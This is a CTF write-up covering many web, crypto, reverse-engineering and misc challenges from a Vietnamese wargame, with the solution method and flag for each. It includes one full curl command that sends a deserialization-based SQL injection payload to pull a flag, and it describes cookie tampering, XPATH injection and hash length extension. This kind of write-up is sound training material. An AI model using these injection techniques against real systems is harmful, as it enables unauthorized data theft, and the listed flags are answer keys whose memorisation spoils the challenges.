Below you can find a quick write-up of some challs. Because there are so many of them, I'm only writing out the key points, the rest is up to you :P
The = signature at the end makes it fairly easy to identify it as base64 encoded. The decoded text is M,'@S,#`T>W!L96%S95]S=6)M:71?...
This text is still encrypted and because it consists of only printable characters it can be guessed that encryption method is
uuencode. It can be decrypted using this
online decryption tool but you have to break it into 2 parts to fully decrypt the flag: 0x3004{please_submit_this_sh!t_and_get_your_rewards}
Crypto 50: Quảng Nam :: Chuyển vận lương thực
The encryption is done in the cookie. Trying with different inputs should bring you to a conclusion that the username and the timestamp are combined, xored with a binary key and then base64 encoded.
The string encrypted in the cookie is something like "username=admin;time=2014-04-27T16:27:24.644158", to solve the challenge you have to append ";admin=true" to it and get the flag: 0x3004{you_control_the_world}
Web 50: Yên Bái :: Injection1
Someone else in our team solved it, basically the session is managed by the serialized data in the cookie and you can exploit the deserialization to do SQL injection and get the flag.
Misc 50: Bạc Liêu :: Hidden1
The flag is hidden somewhere in the source code of the
challenge page: 0x3004{_haha_you_found_it_:D}
Misc 50: Đà Nẵng :: Áo Dài
This is a BMP stegano. Analysis with my
Steganabara's Bit Mask Filter (or Caesum's
Stegsolve) will reveal that there is data hidden in the LSB of the pixels:
In fact the authors herd you like BMP so they put a BMP in your BMP so you can extract while you extract :P
xp45g did this with a "murderous unreadable 1-liner", and here's the final result:
Misc 50: Vĩnh Long :: HeartBeat
This is similar to the famous
HeartBleed bug in OpenSSL. It is even easier because you can input the length directly into the URL. If you input a bigger length than the actual string the rest of the memory will be printed out. We used a length of -1 to dump out everything and after some tries we were able to get the flag: 0x3004{He4rtBle3d_works_this_way}
Misc 50: Lâm Đồng :: Hidden2
The flag is again hidden in the source code of the
home page: 0x3004{hidden2_hidden_everywhere}
Web 100: Hải Dương :: CRYPOT
The encryption can be broken using
differential attack. In each loop the ciphertext is xored with a hash created from a character in the input and a character in the flag so you can use 2 inputs with the same length as the flag (31) but with different characters at the end, xor the results (which is also the xored result of 2 hashes in the last loop) and from there work out the last character in the flag. Continuing backwards and you can recover the flag: 0x3004{p_to_the_h_to_the_p_yo!}
Web 100: Tuyên Quang :: Injection2
You can still exploit the deserialization to inject SQL code. Below was how
xp45g solved it :P
10:54:36: $ phpsessid="$(tr -cd a-zA-Z0-9 < /dev/urandom | head -c 32)" ; curl -s http://challenges.wargame.vn/100-Injection2_00cda8c5d1f13e0e2cb2825c0e9e6618/ -H "Cookie: PHPSESSID=$phpsessid;login=$(./ser.php "wtf',''),(null,(select flag from web100_flag), '$phpsessid') #")" | html2text
10:54:38: Welcome you back. This time, we made it more secure!
10:54:40: Your action has been logged to our DB.
10:54:42: You are logged in as guest.
10:54:44: Your action has been logged to our DB.
10:54:46: Your last logged in time: 0x3004{php_0bj3ct_m4k35_1t_3a5y}.
10:54:48: win \o/
Web 100: Quảng Ninh :: PATH TO PRO
This was quite an annoying chall. At first we found the blind SQL injection with double quotes and substring function and used it to get the admin password YOUWONTBEABLETOGUESSTHISPASS__@#!@(#*!@(#*!@(#*)(!@*# but that wasn't enough to get the flag.
We were having troubles identifying the DBMS because of so many abnormalities and in the end it turned out the challenge was about
XPATH injection, something similar to SQL injection in theory but not as popular in practice. The flag was 0x3004{XXXpath}
RE 100: Nghệ An :: PHPVLD
Our team had some troubles with this chall because of misinterpreting the code but it was basically just hash collision. Just generate 2 strings with the same MD5 hashes and the chall is solved.
Crypto 100: Bình Định :: SERICRYPT
The method to solve this chall is similar to the one described in the
RSA page: you factorize n, calculate phi(n), then calculate modulus multiplication inverse and decrypt the message. The result is: 6396138900968155672706619512005662088160241943837385041483898733707420105484519573719621312884.
Misc 100: Gia Lai :: Wireshark
This was an easy chall. At first glance we thought the traffic was encrypted using SSL but in the end the flag was transferred in just plain text and you can see it by searching for 0x3004 in a text editor: 0x3004{I_l0v3_wir35h4rk_S0_MUCH!}
Misc 100: Trà Vinh :: f_x
Our analysis was like this: f(12)/f(11) ~= 2.8, f(11)/f(10) ~= 3.1, (12/11)^12 = 2.84094437661548, (11/10)^12 = 3.138428376721 so the function should be a polynomial with the degree of 12. With this the problem becomes solving a system of 13 equations and even though I only had to modify my old program a little I was still a lot slower than xp45g's
z3. The flag was 0x3004{M4thz1g}
Crypto 150: Thừa Thiên Huế :: Tàng hình
This is basically a stegano, the flag was hidden insite the KingthingsTrypewriter2 font file. Opening it using a font editor like
ttfedit and you'll get the flag: 0x3004{H4Ppy_huNt1Ng} - it was changed later but someone else in our team solved it and I'm too lazy to solve it again :P
Web 150: Lạng Sơn :: XYZ Bank
If you use the default login suggested by the page you'll get a cookie that decrypts to something like ["guest","guest",1234]. Using a python mysql bug you can use ["guest",0,1234] and the session is still valid. Changing the username to admin and brute-forcing the pin you can get the flag: 0x3004{goooo_home_homie}
Crypto 200: An Giang :: Super RSA
Your job is to break an RSA encryption knowing just the public key. However with the source code available you can see that there is a weakness in the encryption: the private key is small (only 1024 bits) while the public key is big (6144 bits). Now the encryption can be broken using
Wiener's attack.
Crypto 250: Lai Châu :: CRYPTOWWW
In this chall you need to bypass the hash check to do SQL injection. This can be done using
hash length extension attack. At first we were getting no result because of assuming the secret length of 6 but in the end we wrote a program to brute-force the length (which turned out to be more than 20) and got the flag: 0x3004{www_mix_crypto_ftw}
Bonus: Pwn 300: Hà Nội :: Vượt Ngục 2
The nerd term for this type of challenge is "golfing". Below is the result of our python experts' teamwork. Don't ask me for the code explaination :P In fact after the CTF ended they managed to golf it down even more :P
